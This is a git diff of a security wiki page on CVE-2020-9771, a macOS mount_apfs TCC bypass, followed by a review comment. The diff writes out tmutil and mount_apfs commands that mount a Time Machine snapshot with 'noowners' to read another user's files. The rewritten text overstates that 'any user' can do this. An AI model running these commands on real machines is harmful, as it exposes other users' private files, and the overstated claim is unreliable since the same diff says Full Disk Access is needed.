GITBOOK-3955: change request with no subject merged in GitBook
parent ec8bf1dfc0
commit c32bee9032
@ -175,29 +175,34 @@ The extended attribute `com.apple.macl` **can’t be cleared** like other extend
## Bypasses
## Bypasses
## CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
If the system has some **time machine snapshots** generated, **any user** (even unprivileged ones) can mount it an **access ALL the files** of that snapshot.
**Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\
The **only privileged** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin.
{% code overflow="wrap" %}
{% code overflow="wrap" %}
```bash
```bash
# Create snapshot
tmutil localsnapshot
# List snapshots
# List snapshots
tmutil listlocalsnapshots /
tmutil listlocalsnapshots /
Snapshots for disk /:
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
mkdir /tmp/snap
# Mount it
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o nobrowse,ro -s ccom.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
# Access it
ls /tmp/snap/Users/admin_user # This will work
ls /tmp/snap/Users/admin_user # This will work
```
```
{% endcode %}
{% endcode %}
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/) but in there it's explained that after the "fix" only applications with **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) will be able to do this.
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
### Write Bypass
### Write Bypass
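Review bot: the rewritten paragraph contradicts itself: it opens with "**Any user** (even unprivileged ones) can create and mount a time machine snapshot" and only two lines later states that the application used needs **Full Disk Access** (`kTCCServiceSystemPolicyAllfiles`) granted by an admin, which is exactly the post-fix restriction the removed sentence described. Lead with that precondition (for example "Any user whose terminal application has been granted Full Disk Access can create and mount a time machine snapshot and access all its files") so a reader does not take away that the bypass still works without FDA. Two typos carried into the new text: "an **access ALL the files**" should be "and", and "The **only privileged** needed" should be "The **only privilege** needed" with "which need to be granted" becoming "which needs to be granted". The new `mount_apfs` line also drops `nobrowse,ro` while adding `noowners`; if that change is intentional, say so in the comment, which currently explains only what `noowners` does.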